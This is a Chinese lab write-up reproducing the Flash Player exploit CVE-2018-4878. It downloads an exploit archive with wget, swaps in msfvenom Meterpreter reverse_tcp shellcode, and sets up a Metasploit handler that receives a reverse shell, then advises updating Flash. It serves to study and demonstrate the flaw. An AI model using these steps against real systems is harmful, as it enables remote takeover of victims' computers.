Flash 0day CVE-2018-4878 漏洞复现
0x01 前言
Adobe公司在当地时间2018年2月1日发布了一条安全公告:
https://helpx.adobe.com/security/products/flash-player/apsa18-01.html
公告称一个新的Flash 0Day漏洞(CVE-2018-4878)已经存在野外利用,可针对Windows用户发起定向攻击。攻击者可以诱导用户打开包含恶意 Flash 代码文件的 Microsoft Office 文档、网页、垃圾电子邮件等。
0x02 漏洞影响
Flash Player当前最新版本28.0.0.137以及之前的所有版本
0x03 漏洞复现
环境测试:
攻击机:kali
目标靶机:win7x64 +IE8.0+FLASH player28.0.0.137
1.下载cve-2018-4878的脚步利用
wget https://raw.githubusercontent.com/backlion/demo/master/CVE-2018-4878.rar
2.解压压缩文件后,可看到cve-2018-4878.py和exploit.swf
3. 我们需要对cve-2018-4878.py进行修改,原作者将代码中的stageless变量改成了true,正确的应该改成:stageless = False。附上原作者的exp地址:https://github.com/anbai-inc/CVE-2018-4878.git
4.其次需要修改替换原来弹计算器的shellcode
5.在kali下生成msf的shellcode:
msfvenom -pwindows/meterpreter/reverse_tcplhost=your host lport=your port -fpython>shellcode.txt
6.将生成的shellcode替换掉原有cve-2018-4878.py中的shelldoce即可
7.在kal下执行cve-2018-4878.py,这里需要和index.html在一个目录下,即可生成恶意的exploit.swf
8.这里为了演示我将index.html和exploit.swf一同拷贝到目标靶机win7x64上,在ie浏览器下打开(也可以通过搭建web服务器的形式将index.html和exploit.swf放在web目录下,访问地址来打开)。
9.在msf 下进行监听设置
msf > use exploit/multi/handler
msf exploit(handler) > set payloadwindows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 10.0.0.217
msf exploit(handler) > set lport 443
msf exploit(handler) > exploit
10.当打开目标恶意的index.html页面时,即可触发反弹shell
0x04 漏洞修复
建设通过官方网站升级到最新版本
https://get.adobe.com/cn/flashplayer/
Flash 0day CVE-2018-4878 漏洞复现相关推荐
- Google 0day远程命令执行漏洞复现
目录 漏洞介绍 影响版本 漏洞复现 解决方案 漏洞介绍 国外安全研究员发布了 Google Chrome 浏览器远程代码执行 0Day 漏洞的 PoC,攻击者可以利用漏洞构造特制的页面,用户访问该页面 ...
- Hacking Team Flash 0day漏洞学习笔记
周日的夜晚,与囧桑下载下来Hacking Team之前爆出的flash 0day漏洞,怀着紧张激动的心情,在自己的机子上做了实验,经测试,在我的虚拟机(一个sp3的XP,貌似没装Flash)上根本跑不 ...
- 海康威视iVMS综合安防系统任意文件上传漏洞复现(0day)
0x01 产品简介 海康威视iVMS集中监控应用管理平台,是以安全防范业务应用为导向,以视频图像应用为基础手段,综合视频监控.联网报警.智能分析.运维管理等多种安全防范应用系统,构建的多业务应用综合管 ...
- 海康威视iVMS系统在野 0day漏洞复现
漏洞概述 简介:海康威视iVMS系统存在在野 0day 漏洞,攻击者通过获取密钥任意构造token,请求/resourceOperations/upload接口任意上传文件,导致获取服务器webshe ...
- 海康威视iVMS综合安防系统任意文件上传漏洞复现 (0day)
前言 此文章仅用于技术交流,严禁用于对外发起恶意攻击!!! 一.漏洞描述 海康威视iVMS系统存在在野 0day 漏洞,攻击者通过获取密钥任意构造token,请求/resourceOperations ...
- 【漏洞复现】海康威视iVMS综合安防系统任意文件上传漏洞复现 (在野0day)
文章目录 前言 声明 一.产品简介 二.漏洞概述 三.影响范围 四.漏洞验证 五.漏洞利用 六.修复建议 前言 海康威视iVMS综合安防系统存在任意文件上传漏洞 ,攻击者可通过构造特定Payload实 ...
- CVE(2017-15715、2021-41773、2021-40438)漏洞复现
仅用于学习参考,不要贪玩哦(*^▽^*) 目录 CVE-2017-15715 漏洞介绍 漏洞复现 CVE-2021-41773 漏洞介绍 漏洞复现 CVE-2021-40438 漏洞介绍 漏洞复现 一 ...
- 大华智慧园区综合管理平台RCE漏洞复现(0day)
0x01 产品简介 "大华智慧园区综合管理平台"是一款综合管理平台,具备园区运营.资源调配和智能服务等功能.平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务 ...
- 渗透测试之路:ThinkPHP漏洞复现
1)简介 ThinkPHP是一个免费开源的,快速的,简单的面向对象的国产轻量级PHP开发框架. ThinkPHP遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业级应用开而诞生的,具有 ...
最新文章
- Spark弹性式数据集RDDs
- python(matplotlib5)——Contours 等高线图
- Linux 命令之 deluser -- 删除用户
- android 仿qq it蓝豹,《IT蓝豹》listview实现各种版面设计功能
- mysql 数据库授权(给某个用户授权某个数据库)
- LUN/PV/VG/LV
- vue main.js中引入js_手把手教你深入Vue3.0(Vue-cli4)项目打包性能优化实践
- 服务器需要哪些芯片,云计算的服务器需要芯片
- Linux下多进程服务端客户端模型二(粘包问题与一种解决方法)
- 召回离线评估指标(二)
- JAVA基础第四章-集合框架Collection篇
- static library libs/libvpx/libvpx.a is not portable!
- 20200106每日一句
- 卓有成效的管理者—第七章 有效的决定
- Genotype陨石的秘密
- 怎样快速将pdf在线转换成word免费版
- hive修改分区信息
- 【有料c++题目周刊 | 第四期】贝克街神探
- 在GT4 Client端EndpointReferenceType的标准序列化方法
- php-gtk2怎么用,PHP+GTK2 初体验,简单计算器客户端
热门文章
- 软件工程(QLGY2015)博客点评总结
- QT实现图片转pdf
- uniapp 点击动画_uni-app自定义加载动画组件
- 定义一个二维数组,写函数来实现对该二维数组求最大值。(要求,用行指针为函数形参)
- c语言编程雅可比解方程,求雅可比迭代法解方程组的C\C++程序,急需一个运用雅可比迭代法求线性方程组的C/C++程序!...
- matlab中normcdf函数用法,Matlab中标准正态分布的密度函数是normcdf(x,0,1)
- python通往天堂的选择_python获取电影天堂各版块电影
- Sysbench性能测试(一):sysbench简介与安装
- 读王立群《千古一帝秦始皇》有感
- jenkins:Build periodically和Poll SCM的区别